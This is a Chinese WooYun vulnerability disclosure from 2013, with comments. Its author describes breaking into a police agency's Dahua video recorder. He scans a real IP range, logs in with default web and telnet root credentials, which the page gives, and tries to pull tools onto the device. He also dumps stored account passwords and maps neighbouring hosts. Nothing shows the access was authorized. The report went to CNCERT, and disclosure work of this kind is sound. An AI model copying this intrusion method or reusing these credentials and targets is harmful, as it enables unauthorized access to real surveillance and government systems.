当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-047371

漏洞标题:记一次失败的渗透从4年前的老文章到监控录像机最终直捅某敏感部门内网

相关厂商:某部门

漏洞作者: safe121

提交时间:2013-12-30 11:29

修复时间:2014-02-13 11:30

公开时间:2014-02-13 11:30

漏洞类型:服务弱口令

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-30: 细节已通知厂商并且等待厂商处理中
2014-01-04: 厂商已经确认,细节仅向厂商公开
2014-01-14: 细节向核心白帽子及相关领域专家公开
2014-01-24: 细节向普通白帽子公开
2014-02-03: 细节向实习白帽子公开
2014-02-13: 细节向公众公开

简要描述:

某敏感部门内部监控系统外网开房并且弱口令,可TELNET。

详细说明:

今天闲的蛋蛋疼,看了ChinaGFW.Org的一篇老文章,发现了几个牛逼的IP地址
219.142.121.211 —— Ministry-Of-Public-Security-Information-Communication-Agency
222.66.235.172 —— BAOSHAN-POLICE
121.10.215.35 以及 218.66.36.226
这些牛逼的IP地址有什么特点呢?

User-Agent 统一为 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)	
Accept 统一为 text/*,*/*
Accept-Language

统一为 en-us
不过当我看到第一个IP地址的WHOIS信息居然为Ministry-Of-Public-Security-Information-Communication-Agency的时候,我——震惊了。
收好震碎的蛋,拿起了古董箱里的X-Scan对219.142.121.208 - 219.142.121.223一顿扫描过后,得到了一个牛逼的IP地址219.142.121.212
这个IP地址开了80端口,23端口,于是在web端尝试了admin / admin成功了(密码我改成了admin / admins 因为让别人帮忙渗透结果他乱发密码来的~)
于是尽最大可能收集信息

Screenshot from 2013-12-29 04:39:03.png


(这个看起来像采集中心服务器的IP地址,不过因为对这种协议不太了解,无法进行下一步渗透)

Screenshot from 2013-12-29 04:41:06.png


(网关地址)
然后又尝试对telnet端口进行进入,试了admin/admin admin/12345 admin/123456
admin/[null] 都不对,怎么办呢?既然连web默认口令都没改肯定是telnet都没改,那么来找下厂家~
打开web后,查看源代码,居然连个copyright都没有,js文件中注释里也没有copyright,这厂商是多么的大无畏精神啊~
突然想起,加载这个监控系统要一个ActiveX插件,那么来看看插件名称吧~

Screenshot from 2013-12-29 15:37:10.png


谷歌了一下DHSurveillanceCtrl居然没有,于是又谷歌了一下webrec.cab
根据谷歌牛逼的结果,老夫找到了该监控系统叫大华硬盘录像机
也找到了密码 用户名:root 密码:vizxv
多么牛逼的密码?还好当初老夫没爆破,不然这辈子也破不开。
于是果断尝试ssh转发,弹出了ssh命令不存在,不过老夫也没很震惊,因为这种busybox-based系统很少有ssh命令,于是老夫又进行了
于是netstat -l 没开ftp端口,之后
telnet x.x.x.x >> /tmp/1.sh , wget , ftp , curl , scp , ………… 最终在尝试tftp的时候终于有了反应,诶?怎么是系统信息。
之后才发现busybox可以看指定的函数的。。

Currently defined functions:
[, [[, arping, ash, awk, cat, chmod, cp, date, du, echo,
egrep, fdisk, fgrep, find, free, fsck, ftpget, ftpput,
getty, grep, hwclock, ifconfig, inetd, init, insmod, kill,
killall, linuxrc, ln, login, ls, lsmod, makedevs, mdev,
mkdir, mkfs.minix, mknod, modprobe, mount, mv, netstat,
ping, printenv, ps, pwd, readlink, rm, rmdir, rmmod, route,
sed, sh, sync, telnetd, test, top, touch, traceroute,
umount, xargs


Screenshot from 2013-12-29 15:44:55.png


不管了,先找个服务器搭建个tftp
搭建好之后,tftp获取ssh以及ssh_config,诶?还是系统信息,看来这个tftp是被阉割过了。
怎么办呢?凉拌炒鸡蛋吧~
之后又收集了一圈信息
# cat Account1
// 默认的帐户配置,默认的组包含组名和组描述等必填项,默认的用户包含用户名,用户
// 描述,所属组名,密码,是否共享等必填项。default用户不用写在下表中。
{

"Groups" : [
{
"AuthorityList" : [
"ShutDown",
"Monitor_01",
"Replay_01",
"Record",
"Backup",
"MHardisk",
"MPTZ",
"Account",
"Alarm",
"QueryLog",
"DelLog",
"SysUpdate",
"AutoMaintain",
"GeneralConf",
"EncodeConf",
"RecordConf",
"ComConf",
"NetConf",
"AlarmConf",
"VideoConfig",
"PtzConfig",
"DefaultConfig",
"VideoInputConfig"
],
"Id" : 1,
"Memo" : "administrator group",
"Name" : "admin"
},
{
"AuthorityList" : [ "Monitor_01", "Replay_01" ],
"Id" : 2,
"Memo" : "user group",
"Name" : "user"
}
],
"Users" : [
{
"AuthorityList" : [
"ShutDown",
"Monitor_01",
"Replay_01",
"Record",
"Backup",
"MHardisk",
"MPTZ",
"Account",
"Alarm",
"QueryLog",
"DelLog",
"SysUpdate",
"AutoMaintain",
"GeneralConf",
"EncodeConf",
"RecordConf",
"ComConf",
"NetConf",
"AlarmConf",
"VideoConfig",
"PtzConfig",
"DefaultConfig",
"VideoInputConfig"
],
"Group" : "admin",
"Id" : 1,
"Memo" : "admin 's account",
"Name" : "admin",
"Password" : "XDc1JPnF",
"Reserved" : true,
"Sharable" : true
},
{
"AuthorityList" : [
"ShutDown",
"Monitor_01",
"Replay_01",
"Record",
"Backup",
"MHardisk",
"MPTZ",
"Account",
"Alarm",
"QueryLog",
"DelLog",
"SysUpdate",
"AutoMaintain",
"GeneralConf",
"EncodeConf",
"RecordConf",
"ComConf",
"NetConf",
"AlarmConf",
"VideoConfig",
"PtzConfig",
"DefaultConfig",
"VideoInputConfig"
],
"Group" : "admin",
"Id" : 2,
"Memo" : "888888 's account",
"Name" : "888888",
"Password" : "4WzwxXxM",
"Reserved" : true,
"Sharable" : true
},
{
"AuthorityList" : [ "Monitor_01", "Replay_01" ],
"Group" : "user",
"Id" : 3,
"Memo" : "666666 's account",
"Name" : "666666",
"Password" : "sh15yfFM",
"Reserved" : true,
"Sharable" : true
},
{
"AuthorityList" : [ "Monitor_01", "Replay_01" ],
"Group" : "user",
"Id" : 4,
"Memo" : "default account",
"Name" : "default",
"Password" : "OxhlwSG8",
"Reserved" : true,
"Sharable" : false
}
]
}


密码不知什么方式加密的

#
ARP表
# arping -f 219.142.121.209
ARPING to 219.142.121.209 from 219.142.121.212 via eth0
Unicast reply from 219.142.121.209 [28:6e:d4:95:fd:57] 4.770ms
Sent 1 probe(s) (1 broadcast(s))
Received 1 replies (0 request(s), 0 broadcast(s))
# arping -f 219.142.121.210
ARPING to 219.142.121.210 from 219.142.121.212 via eth0
Unicast reply from 219.142.121.210 [0:65:11:0:42:bb] 0.539ms
Sent 1 probe(s) (1 broadcast(s))
Received 1 replies (0 request(s), 0 broadcast(s))
# arping -f 219.142.121.211
ARPING to 219.142.121.211 from 219.142.121.212 via eth0
Sent 3 probe(s) (3 broadcast(s))
Received 0 reply (0 request(s), 0 broadcast(s))
# arping -f 219.142.121.212
ARPING to 219.142.121.212 from 219.142.121.212 via eth0
^[[ASent 4 probe(s) (4 broadcast(s))
Received 0 reply (0 request(s), 0 broadcast(s))
# arping -f 219.142.121.213
ARPING to 219.142.121.213 from 219.142.121.212 via eth0
Unicast reply from 219.142.121.213 [0:10:db:57:94:41] 2.050ms
Sent 1 probe(s) (1 broadcast(s))
Received 1 replies (0 request(s), 0 broadcast(s))
# arping -f 219.142.121.214
ARPING to 219.142.121.214 from 219.142.121.212 via eth0
Unicast reply from 219.142.121.214 [0:95:10:91:13:fb] 1.374ms
Sent 1 probe(s) (1 broadcast(s))
Received 1 replies (0 request(s), 0 broadcast(s))
# arping -f 219.142.121.215
ARPING to 219.142.121.215 from 219.142.121.212 via eth0
Sent 15 probe(s) (15 broadcast(s))
Received 0 reply (0 request(s), 0 broadcast(s))
#
# traceroute 202.102.110.2
traceroute to 202.102.110.2 (202.102.110.2), 30 hops max, 40 byte packets
1 219.142.121.209 (219.142.121.209) 3.689 ms 3.602 ms 5.440 ms
2 219.141.131.157 (219.141.131.157) 2.705 ms * 2.755 ms
3 202.97.53.89 (202.97.53.89) 7.431 ms 5.628 ms 3.694 ms
4 202.97.37.70 (202.97.37.70) 5.646 ms 3.470 ms 3.970 ms
5 202.97.65.202 (202.97.65.202) 29.059 ms 102345.869 ms 27.525 ms
6 221.231.146.249 (221.231.146.249) 25.425 ms 25.928 ms 25.388 ms
7 202.102.110.78 (202.102.110.78) 26.846 ms 27.270 ms 26.786 ms
8 202.102.110.68 (202.102.110.68) 103030.110 ms 27.307 ms 26.972 ms
9 * * *
# traceroute 121.189.57.81
traceroute to 121.189.57.81 (121.189.57.81), 30 hops max, 40 byte packets
1 219.142.121.209 (219.142.121.209) 4.131 ms 3.186 ms 3.604 ms
2 219.141.142.81 (219.141.142.81) 5.481 ms 3.923 ms 3.156 ms
3 118.84.3.21 (118.84.3.21) 6.906 ms 202.97.57.209 (202.97.57.209) 6.462 ms
13600.153 ms
4 202.97.53.166 (202.97.53.166) 3.596 ms 202.97.53.86 (202.97.53.86) 4.916 m
s 202.97.53.166 (202.97.53.166) 3.458 ms
5 202.97.53.238 (202.97.53.238) 18.263 ms 202.97.58.94 (202.97.58.94) 3.897
ms 202.97.53.238 (202.97.53.238) 4.007 ms
6 202.97.58.81 (202.97.58.81) 3.808 ms 256304.746 ms 3.697 ms
7 202.97.5.98 (202.97.5.98) 55.685 ms 55.249 ms 55.465 ms
8 112.174.84.233 (112.174.84.233) 43.193 ms 43.191 ms 43.055 ms


看起来这个出口是直接接入电信骨干网的
公安部,你为何这么屌?

漏洞证明:

Screenshot from 2013-12-29 04:39:03.png


Screenshot from 2013-12-29 04:41:06.png

修复方案:

改密码,收回外网访问权限~BTW:如果有的话求送个无GFW的国内VPN(括弧笑~)

版权声明:转载请注明来源 safe121@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-01-04 10:51

厂商回复:

对于服务器所属方,CNVD暂未能直接认定,不过已经转由CNCERT向国家某信息安全协调机构上报,由其后续尝试通报可能的网站管理单位。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-12-30 11:52 | safe121 ( 实习白帽子 | Rank:98 漏洞数:11 | http://www.gov.cn)

    的标题和谐掉了~

  2. 2013-12-30 12:03 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @safe121 你懂的

  3. 2013-12-30 12:05 | safe121 ( 实习白帽子 | Rank:98 漏洞数:11 | http://www.gov.cn)

    @xsser 你懂我懂大家懂~剑心你家漏水了,开门查下水表..

  4. 2013-12-30 12:11 | hanole ( 路人 | Rank:0 漏洞数:1 | [用鼠标的那只手有没有很冷?])

    某部门?

  5. 2013-12-30 12:22 | safe121 ( 实习白帽子 | Rank:98 漏洞数:11 | http://www.gov.cn)

    @hanole 是的,团灭@xsser 部门

  6. 2013-12-30 12:31 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @safe121 ~。~

  7. 2013-12-30 12:55 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    - - 围观一下

  8. 2013-12-30 13:28 | adm1n ( 普通白帽子 | Rank:216 漏洞数:66 | 只是一个渣渣而已。。。)

    开房~洞主请跟我到有关部门喝茶~

  9. 2013-12-30 14:12 | 刺刺 ( 普通白帽子 | Rank:603 漏洞数:52 | 真正的安全并不是技术,而是人类善良的心灵...)

    难道是福建公安厅?

  10. 2013-12-30 15:12 | 浅音 ( 路人 | Rank:0 漏洞数:2 | 浅音sama)

    开门查水表

  11. 2013-12-30 16:23 | B1acken ( 普通白帽子 | Rank:174 漏洞数:56 | 渣渣)

    @xsser 我有一个某公安局的怎么没有审核

  12. 2013-12-30 16:45 | safe121 ( 实习白帽子 | Rank:98 漏洞数:11 | http://www.gov.cn)

    @刺刺 不敢说啊不敢说 , 你去问@xsser 吧

  13. 2013-12-30 16:47 | also ( 普通白帽子 | Rank:424 漏洞数:52 | 招渗透/php/前端/ios&android安全,广州地...)

    你好我是方大顿@xsser

  14. 2013-12-31 14:12 | 核攻击 ( 实习白帽子 | Rank:35 漏洞数:7 | 统治全球,奴役全人类!毁灭任何胆敢阻拦的...)

    mark.

  15. 2014-01-04 15:02 | 哎呀 ( 实习白帽子 | Rank:79 漏洞数:10 | 忙啊!!!)

    上次发了公(和)安网,审核木有通过!!晕

  16. 2014-01-05 02:15 | safe121 ( 实习白帽子 | Rank:98 漏洞数:11 | http://www.gov.cn)

    向国家某信息安全协调机构上报...... 某...

  17. 2014-02-13 13:29 | Shady ( 路人 | Rank:24 漏洞数:8 | Test)

    @safe121 楼主收好震碎的蛋

  18. 2014-02-13 14:10 | JohnWong ( 路人 | Rank:28 漏洞数:7 | Call me John. Silly John.)

    好(diao)威(zha)武(tian)